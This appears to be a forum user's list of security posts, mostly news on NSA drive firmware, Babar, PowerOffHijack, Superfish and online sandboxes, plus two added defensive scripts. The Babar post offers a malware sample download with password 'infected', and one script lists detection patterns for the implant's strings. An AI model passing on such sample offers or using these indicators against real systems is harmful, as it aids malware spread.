Aerosol

Everything posted by Aerosol

  1. The Russian cyber-security company Kaspersky has discovered an American spying program placed in Seagate and Western Digital HDDs. In the last 5 years the HDD market has seen a few important changes and the number of manufacturers has dropped from 3 to 2. For this reason some suspicions are going around. At present we have two big American manufacturers: Seagate and WD. In turn, they have also taken over other divisions such as Hitachi, Samsung, Toshiba or HGST. According to Kaspersky, the American cyber-surveillance agency NSA introduced spying code into HDDs. It acts on the primary data, the high-level files, the operating system or even the usage of the HDD. Kaspersky found this spying program in PCs from more than 30 countries, most of them in Iran, Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. Ha! Seagate and WD denied sharing the firmware source code with any government agency and maintained that their firmware is designed to prevent data being taken out by unusual means. Kaspersky stated that it is quite easy for agencies to obtain the software's source code by posing as a software developer. The government can request the source code simply by asking, as a buyer that needs to inspect the code to make sure it is clean before it can purchase PCs running their HDDs. What is surprising is how the HDD firmware was compromised and how it spread so quickly. Seagate and WD have production facilities in countries such as Thailand and China, located in high-security areas to prevent theft of intellectual property or sabotage. We cannot imagine modified firmware without the companies' cooperation. Source
  2. According to the analysis The Global State of Information Security Survey 2015, carried out by PwC, in 2014 the number of detected security incidents grew by 41% in Europe and by 11% in North America, while Asia recorded a 5% increase. South America is the only region that recorded a decrease in this respect, of about 9%. The total number of cyber-security incidents detected in companies in 2014 grew by 48% compared to the previous year, reaching 42.8 million events globally, and the losses caused by such incidents were estimated at 2.7 billion dollars, up 34% from 2013. Source
  3. @SynTAX the part about salaries is also the employees' fault; they are taught to keep quiet or else they get fired (they have it ingrained in their minds that they can be replaced at any time), you get it? If you, as an employee of "RCS & RDS", went to ask for a raise, you would risk losing your job, and that is why they work for a salary of 8 million. In general you are taught to keep quiet or else you lose your job, something like: "Our boss is our master"
  4. Sample of the Babar malware discovered by the NSA. It is believed to originate from French intelligence.
     More info:
     • http://www.spiegel.de/media/media-35683.pdf
     • Cyphort » Blog Archive Babar: Suspected Nation State Spyware In The Spotlight - Cyphort
     • yara rules: [YARA] Barbar/SNOWGLOBE Rules - Pastebin.com
     babar.exe Strings:
     MD5s:
     • 48fe7f28.msi = 8ead84dd36d8f14ca98f7755a9f5a069
     • Barbar.exe = 9fff114f15b86896d8d4978c0ad2813d
     • perf_585.dll [implant] = 4525141d9e6e7b5a7f4e8c3db3f0c24c
     • update.msi = f2ccf4cccead21b1674d7df288722a3d
     • wbemprox.log = 577b71cd95333f6df5bfc1fbc64d98ca
     DOWNLOAD Pass: infected
     Source
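A defender-side triage script, added here as an example and not part of the post or of the Cyphort YARA rules: it pulls printable strings out of a binary the way `strings` does and scores them against indicators quoted in the dump above (the Babar64 PDB path, the hard-coded SDDL ACL, the self-deleting cmd.exe line, the silent regsvr32 switches, the WOW64 redirection APIs and EnableLUA). The sample bytes, the weights and the threshold are constructed for the demo, not taken from the real implant.

```python
import re

# Printable-ASCII runs of at least six bytes, the same thing `strings` prints.
# UTF-16LE strings are ignored here to keep the example short.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")

# (name, pattern, weight). The patterns are taken from the strings quoted in
# the post; the weights are this example's own judgement (constructed), not
# Cyphort's. The PDB path and the hard-coded ACL are specific to this build,
# while the Win32 API names alone appear in plenty of clean software.
INDICATORS = [
    ("pdb_path", re.compile(rb"Babar64\\Babar64\\obj\\DllWrapper Release\\Release\.pdb"), 5),
    ("sddl_acl", re.compile(rb"D:\(D;OICI;FA;;;AN\)\(A;OICI;FA;;;BG\)"), 3),
    ("self_delete", re.compile(rb"/c start /wait \d+ && del"), 3),
    ("regsvr32_silent", re.compile(rb"regsvr32\.exe|/s /n %s \"%s\""), 1),
    ("fs_redirection", re.compile(rb"Wow64(Disable|Revert)Wow64FsRedirection"), 1),
    ("uac_probe", re.compile(rb"EnableLUA"), 1),
]
VERDICT_THRESHOLD = 5  # constructed: one build-specific indicator is enough


def extract_strings(data):
    """Return the printable-ASCII runs in `data` as a list of bytes."""
    return _ASCII_RUN.findall(data)


def match_indicators(data):
    """Map each indicator name to the extracted strings that matched it."""
    hits = {}
    for s in extract_strings(data):
        for name, pattern, _weight in INDICATORS:
            if pattern.search(s):
                hits.setdefault(name, []).append(s.decode("ascii"))
    return hits


def score(hits):
    """Sum the weight of each indicator once, however many strings hit it."""
    weights = {name: weight for name, _pattern, weight in INDICATORS}
    return sum(weights[name] for name in hits)


def triage(data):
    hits = match_indicators(data)
    total = score(hits)
    verdict = "suspicious" if total >= VERDICT_THRESHOLD else "inconclusive"
    return {"score": total, "verdict": verdict, "hits": hits}


# Constructed stand-ins, NOT the real implant: a blob carrying the strings the
# post quotes, and a blob that only imports the same common Win32 APIs.
SUSPECT_BLOB = (
    b"MZ\x90\x00\x03\x00" + b"\x00" * 16
    + b"c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\"
    b"DllWrapper Release\\Release.pdb\x00\x01\x02"
    + b"D:(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)\x00"
    + b"/c start /wait 1000 && del \x00regsvr32.exe\x00/s /n %s \"%s\"\x00"
    + b"Wow64DisableWow64FsRedirection\x00EnableLUA\x00"
)
BENIGN_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"kernel32.dll\x00GetProcAddress\x00IsWow64Process\x00EnableLUA\x00"
)

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_BLOB), ("benign", BENIGN_BLOB)):
        result = triage(blob)
        print(f"{label}: score={result['score']} verdict={result['verdict']}")
        for name, strings in result["hits"].items():
            print(f"  {name}: {strings}")
```

Run against a real file with `triage(open(path, "rb").read())`; the benign blob shows why API names alone must not drive the verdict.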
  5. @Usr6 yes man, because it is used in companies; very many people are used to XP, and if you give them Windows 7/8 they may not manage, even though there is not a big difference. Plus Windows XP is much better than Win8 (that is my opinion); probably also because of the compatibility of some programs XP is used more, since it is more "old". Anyway, what is certain is that the top showed that not only Windows has major problems, it happens to Apple, Linux etc. too... LOL, I just saw what a small percentage Linux has - 1.34% ... // Glad to see activity in a genuinely interesting topic!
  6. Hm, at least your story was funny, I laughed heartily. I think 10% of the employees at RDS actually know what they are doing & the other 90% are the type ("I tried following the instructions, it didn't work, that's it, there's nothing we can do"). A great pity, the fault here lying with those who do the hiring; they should test the staff to see how they cope in certain situations, not hire just because you come and brag that you know x and y (here the problem is more complicated, because if the employer has no knowledge either, how can he test the newcomer?)
  7. @Usr6 possibly that too, but I still tend to believe its absence from the top is due to the fact that "nobody cares about it anymore". Anyway, from what I saw in the top, most of the vulnerabilities (on Windows) are HIGH or MEDIUM, 0 Low, which is a bit fishy
  8. @Usr6 probably because it is obsolete, although it is really odd since there are still quite a lot of Windows XP users (even companies etc...)
  9. and look how "the Apple ends up in the first two places"; as for IE there is nothing new in that, it was to be expected, I mean the browser is completely obsolete. Like, like and Like, Nice share!
  10. In this section, we're providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment.
      • Aerie : https://aerie.cs.berkeley.edu
      • CWSandbox : The Sandbox | Understanding CyberForensics
      • ThreatTrack : http://www.treattrack.com
      • Malbox : Malbox System
      • VisualThreat : http://www.visualthreat.com
      • XecScan : http://scan.xecure-lab.com
      • Norman Sandbox : https://www.norman.com/analysis
      Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has the URL address where the service is available, in case you want to submit different files for analysis.
      • [A] Anubis : http://anubis.iseclab.org
      • [C] Comodo : http://camas.comodo.com
      • [D] Document Analyzer : http://www.document-analyzer.net
      • [E] Eureka : http://eureka.cyber-ta.org
      • [J] Joe Sandbox : http://www.joesecurity.org
      • [M] Malwr : https://malwr.com/submission
      • [MS] Mobile Sandbox : http://mobilesandbox.org
      • [TE] Threat Expert : http://www.threatexpert.com/submit.aspx
      • [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
      • [V] Vicheck : https://www.vicheck.ca
      • [X] Xandora : http://www.xandora.net/xangui
      Note that there are other cloud malware analysis platforms, but we didn't take them into consideration in this article. Therefore, some of them are not presented and described below.

      Supported file formats and document types
      Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate PDF documents. If PDF support is not present, the dissection of the PDF document will not be possible, and consequently the tool will not be able to find the malicious payload. If we look at the PDF document through the eyes of a malware analysis tool, the PDF document is just a set of random bytes.
      The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of the presented elements need no further introduction, since they are used in our everyday lives, but we will still provide a brief explanation of each of them.
      • exe: Windows PE executable files normally used for Windows executable programs.
      • elf: Linux ELF executable files normally used for Linux executable programs.
      • mach-o: Mac OS X Mach-O executable files normally used for Mac executable programs.
      • apk: Android APK executable files
      • url: URLs
      • pdf: PDF documents
      • doc/docx: DOC/DOCX documents
      • ppt/pptx: PPT/PPTX documents
      • xsl/xsls: XSL/XSLS documents
      • htm/html: HTM/HTML web pages
      • jar: JAR Java executable files
      • rtf: RTF documents
      • dll: DLL libraries
      • db: DB database files
      • png/jpg: PNG/JPG images
      • zip/rar: ZIP/RAR archives
      • cpl: Control Panel Applets
      • ie: Analyze the Internet Explorer process when opening a URL
      • ps1: PowerShell scripts
      • python: Python scripts
      • vbs: VBScript files
      The table below presents the supported file formats and document types of each cloud automated malware analysis service. The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools, presented by one or two letters (as presented before). A check mark is used to denote that a certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that support for the document type is being implemented, but not yet available, at the time of this writing.

      Table 1: supported document types by different malware analysis tools (columns A C D E J M MS TE TT V X; the per-column marks did not survive extraction, so only the number of services marking each type is given)
      Document type | Services marking support
      exe           | 7
      elf           | 0 (1 marked *, support in progress)
      mach-o        | 1
      apk           | 3
      url           | 2
      pdf           | 4
      doc/docx      | 4
      ppt/pptx      | 3
      xsl/xsls      | 4
      rtf           | 1
      htm/html      | 2
      jar           | 2
      dll           | 2
      db            | 1
      png/jpg       | 1
      zip/rar       | 2
      cpl           | 1
      ie            | 1
      ps1           | 1
      python        | 1
      vbs           | 1

      I've spent quite some time putting together the table above, which summarizes the supported file formats, document types and other kinds of elements that can be analyzed in an automated fashion. From the table, we can quickly determine that there isn't a service that can be used to analyze any kind of file, which is because malicious code is included in files and documents in profoundly different manners. When adding malicious code to an executable file, we can do so by including malicious assembly instructions in its .text section – and that is only one of the ways of doing it. On the other hand, when including malicious code in a .docx document, we usually include it in the form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we've presented different categories for the file formats, document types and other elements presented in the table above. In each of the categories we'll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code.
      • Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing it to be something they want, which it is, but additional code is usually appended to the file containing a malicious payload that gets executed on the user's computer, therefore infecting it.
      • Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attacker finds a vulnerability in Acrobat Reader (supports the pdf file format) or Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), they can form such a document that the program won't be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document.
      • Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities, as PDF readers and office suites do. Therefore, an attacker can create a malicious website the web browser will not be able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code.
      • Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password-protected archive, the usual analysis solutions won't be able to take a look inside the archive and determine whether it contains malicious files.
      • Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly set up web server. Therefore, an analysis solution should be able to parse various image file formats in order to determine whether they contain anything out of the ordinary, like a malicious payload.
      • Code [python, vbs, ps1]: an attacker can also distribute malicious code written in an appropriate programming/scripting language, which is later processed by some application on the victim's machine. An example of this is a PowerShell (ps1) macro included in a Word document, which gets executed on a user's request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word.

      Techniques for Detecting Automated Environments
      Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries use different checks to determine whether they are executing in a controlled environment, they usually don't execute malicious actions upon environment detection. The picture below presents an overview of malware and the techniques it can use to detect if it's being executed in an automated environment. In order to make the picture clearer, we'll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel mode, depending upon the exploitation techniques. Usually malware is running in user mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel mode. Whether malware is executed in user or kernel mode, there are multiple techniques malware can use to detect if it's being executed in an automated malware analysis environment. At the highest level, the techniques are divided into the following categories:
      • Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain an understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult.
      • Anti-Disassembly Tricks: this category isn't directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn't have much impact in automated malware analysis environments.
      • Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of a sandbox environment is to emulate different parts of the system, or the whole system, to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below.
        - Virtualized Programs: Chromium Sandbox, Sandboxie
        - Linux Containers: LXC, Docker
        - Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU
      Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by a virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis service uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMware, etc. According to the virtualization technology being used, a malware sample can use different techniques to detect that it's being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without executing the malicious code.
      In this section we've seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques malware can use to detect if it's being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it's being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless.

      Conclusion
      In this article we've presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won't be analyzed correctly, resulting in false positives. Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, not every sample can be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis.
      Source
11. WordPress is the most popular CMS (Content Management System) available online nowadays, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion’s share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site.

Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek to compromise it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer.

What Website Hacking Is, and How It Affects You

There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security:

The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time.

The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently on the computers of your site’s visitors, and of course this is never a good thing.

Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site.

Signs that Reveal a Potential WordPress Hack

Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets:

- Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as a spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity.
- Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess.
- Slow performance or crash: This is another indicator that you are in need of a WordPress clean up after a hack. If you are experiencing too slow performance or if you see that your site has crashed, you should look no further.
- Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you.
- Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down.

As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort.

How to Repair Your Hacked WordPress Site

From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that:

- Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version.
- Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan your machine in detail and fix any problems that emerge.
- Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping).
- Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever.
- Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them.
- Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required.
- Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to.
- Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected.
- Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively.

How to Protect Your Site from Any Future Attack

As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent:

- Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur.
- Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed.
- Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down.
- Use 2-Step Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring a much bigger effort towards accessing your site.
- Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you eliminate threats in the future.

From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance!

Source
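The "Back up Everything" and "Check wp-config.php File" steps in the post above both come down to the same check: compare a known-good copy of the site with what is on disk now. The POSIX shell script below is an added example and is not part of the original post, of WordPress, or of WP-CLI. It builds a path-and-SHA-256 manifest of a backup tree and of the live tree, then reports every file that was added, removed or modified. The helper names wp_manifest, wp_tree_diff and demo_tree_diff, and the two tiny directory trees the demo constructs, are my own.

```shell
#!/bin/sh
# Added example (not from the original post or from WordPress): report files that
# differ between a known-good WordPress backup and the live install.
# wp_manifest, wp_tree_diff and demo_tree_diff are hypothetical helper names.

export LC_ALL=C          # byte-wise ordering so "sort" and "join" agree

# Portable SHA-256: fall back to shasum where coreutils sha256sum is absent.
command -v sha256sum >/dev/null 2>&1 || sha256sum() { shasum -a 256 "$@"; }

# Emit "relative/path<TAB>sha256" for every regular file under $1, sorted by path.
wp_manifest() {
  ( cd "$1" || exit 1
    find . -type f | sed 's|^\./||' | sort |
      while IFS= read -r f; do
        printf '%s\t%s\n' "$f" "$(sha256sum "$f" | cut -d' ' -f1)"
      done )
}

# Compare the backup tree ($1) with the live tree ($2); one line per difference:
#   ADDED <path>     present only in the live tree (e.g. a dropped-in PHP file)
#   REMOVED <path>   present only in the backup
#   MODIFIED <path>  present in both, but the content hash differs
wp_tree_diff() {
  tmp=$(mktemp -d) || return 1
  wp_manifest "$1" > "$tmp/backup"
  wp_manifest "$2" > "$tmp/live"
  # Full outer join on the path column; a missing hash is filled with "-".
  join -t "$(printf '\t')" -a 1 -a 2 -e - -o 0,1.2,2.2 "$tmp/backup" "$tmp/live" |
    awk -F '\t' '
      $2 == "-" { print "ADDED\t"    $1; next }
      $3 == "-" { print "REMOVED\t"  $1; next }
      $2 != $3  { print "MODIFIED\t" $1 }
    '
  rm -rf "$tmp"
}

# Constructed fixture: a minimal "backup" and "live" tree with one unchanged,
# one modified, one removed and one added file, so the script runs offline.
demo_tree_diff() {
  base=$(mktemp -d) || return 1
  mkdir -p "$base/backup/wp-content/uploads" "$base/live/wp-content/uploads"
  printf '<?php // front controller\n'           > "$base/backup/index.php"
  printf '<?php // front controller\n'           > "$base/live/index.php"
  printf '<?php define("DB_NAME", "wp");\n'      > "$base/backup/wp-config.php"
  printf '<?php define("DB_NAME", "wp"); // x\n' > "$base/live/wp-config.php"
  printf 'readme\n'                              > "$base/backup/readme.html"
  printf '<?php // not in the backup\n'          > "$base/live/wp-content/uploads/extra.php"
  wp_tree_diff "$base/backup" "$base/live"
  rm -rf "$base"
}

demo_tree_diff
```

Against a real site, call wp_tree_diff with the backup directory and the document root; review every MODIFIED core file and every ADDED file under wp-content/uploads, since that directory should hold media, not PHP, which is also what the "Disable PHP Execution" advice above is about. The script reads the current tree only and changes nothing, so it is safe to run repeatedly (for example from the daily scan the post recommends).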
12. @Nytro part two is out! Gh0st RAT Part 2: Packet Structure and Defense Measures. They should rename the series "The Indian Who Brings the Book, Part I, II, etc."
13. Security researchers have unearthed a new Android Trojan that tricks victims into believing they have switched their device off while it continues "spying" on the users' activities in the background. So, next time be very sure while you turn off your Android smartphones. The new Android malware threat, dubbed PowerOffHijack, has been spotted and analyzed by the researchers at the security firm AVG. It is named PowerOffHijack because the nasty malware has a very unique feature - it hijacks the shutdown process of the user’s mobile phone.

MALWARE WORKS AFTER SWITCHING OFF MOBILES

When a user presses the power button on their device, a fake dialog box is shown. The malware mimics the shutdown animation and the device appears to be off, but actually remains on, giving the malicious program freedom to move around on the device and steal data.

HOW DOES POWEROFFHIJACK MALWARE WORK?

Once installed, the malware asks for root-level permissions and tampers with the 'system_server' file of the operating system to affect the shutdown process. The malware particularly hijacks the mWindowManagerFuncs interface, so that it can display a fake shutdown dialog box and animation every time the victim presses the power button. The nasty malware is apparently being propagated via third-party online app stores, but the researchers haven't mentioned the names of the innocent-looking apps, and they haven’t explained how the malware gains root access to the device. The code shown by AVG appears to contact Chinese services.

USERS AND ANDROID VERSIONS INFECTED

According to the company, PowerOffHijack malware infects devices running Android versions below 5.0 (Lollipop) and requires root access to perform its tasks. So far, PowerOffHijack malware has already infected more than 10,000 devices, mostly in China where the malware was first introduced and offered through the local, official app stores. PowerOffHijack malware has the ability to silently send lots of premium-rate text messages, make calls to expensive overseas numbers, take photos and perform many other tasks even if the phone is supposedly switched off.

EASY STEPS TO GET RID OF POWEROFFHIJACK

In order to get rid of PowerOffHijack malware, users are advised to take some simple steps:

- To restart an infected device manually, just take out the battery.
- Remove malicious, untrusted and useless apps from your Android device.
- Do not install apps from 3rd party app stores.
- Make sure you have a good anti-virus installed and updated on your mobile devices. AVG's antivirus product can detect PowerOffHijack malware.

Source
14. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively.

SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES

Google launched the Google Cloud Security Scanner in beta. The new web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities:

- Cross-Site Scripting (XSS)
- Mixed Content Scripts

Although several free web application vulnerability scanners and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. Google Cloud Security Scanner, by contrast, will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content script flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site.

GO FOR WEB VULNERABILITY SCAN NOW

The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources.

Google notes that there are two typical approaches to such security scans:

- Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations.
- Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle.

Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommends that developers look into a manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives.

Source
  15. Trey Ford from Project Sonar describes the group’s initiative at Kaspersky’s Security Analyst Summit. The Rapid7 service scans public networks for applications, software, and hardware, then analyzes that cache of information to learn trends and gain insight on common vulnerabilities. Source
16. CANCUN–When (or if) people think about the security of the devices they interact with and use on a daily basis, the machines that run their local car wash probably aren’t high up on that list. But, like everything else with a computer for a brain these days, those machines are connected to the Internet. And Billy Rios can hack them.

Rios has spent years pulling apart the innards of all kinds of automation equipment, mostly in the ICS and SCADA realms. But now that TVs, parking meters, dishwashers and everything else under the sun comes with an embedded Web server and other potential targets, he has begun having a look at what surprises those devices hold, as well. Looking in one of the more obscure corners of the web, he discovered automated car wash equipment online. The device he researched has a considerable attack surface. The device was running a version of Windows CE on an ARM processor and after a bit of poking around, Rios found that it also had Telnet enabled and a default five-character password and default username.

“If you know that default username and default password you can do a lot of interesting things,” Rios said in a talk at the Kaspersky Lab Security Analyst Summit here Tuesday. “Your car wash can send you emails and yes, your car wash is on Facebook, too.”

The car wash device controls the mechanisms that wash the top and bottom of a car and by sending special POST requests to the device, an attacker could cause some mischief, such as changing the kind of wash a car is getting. But more seriously, if an attacker was able to access the device, he also could disable the safety sensors on the back and front doors of the wash bay, which prevent them from coming down on a person or vehicle. The problem isn’t limited to one manufacturer or one industry or one kind of device. Lack of security in Internet-enabled devices is spread across the board.

“Remote access changes your threat model. But to be honest, I don’t think we can trust the makers,” Rios said, referring to manufacturers of all sorts of gear with embedded computers and remote access capabilities. “The people who made that car wash won’t understand any of the things we just talked about, like SQL injection or buffer overflows. We’re going to see this in other IoT places as well.”

Security researchers have been turning their attention to the growing crop of non-PC devices that contain computers, WiFi, Bluetooth and other capabilities, and what they’re finding in terms of security controls is typically pretty bad. Many of the companies rushing to Internet-enable everything they make aren’t spending a lot of time thinking about the security implications of what they’re doing, but the attackers are.

“It’s asymmetric. The knowledge in attacking these things is very high and it’s very low in defending,” Rios said.

Source
17. Computer maker Lenovo has been forced to remove hidden adware that it was shipping on its laptops and PCs after users expressed anger. The adware - dubbed Superfish - was potentially compromising their security, said experts. The hidden software was also injecting adverts on to browsers using techniques more akin to malware, they added. Lenovo faces questions about why and for how long it was pre-installed on machines - and what data was collected.

The company told the BBC in a statement: "Lenovo removed Superfish from the preloads of new consumer systems in January 2015. At the same time Superfish disabled existing Lenovo machines in the market from activating Superfish.

Complaining

"Superfish was preloaded on to a select number of consumer models only. Lenovo is thoroughly investigating all and any new concerns raised regarding Superfish."

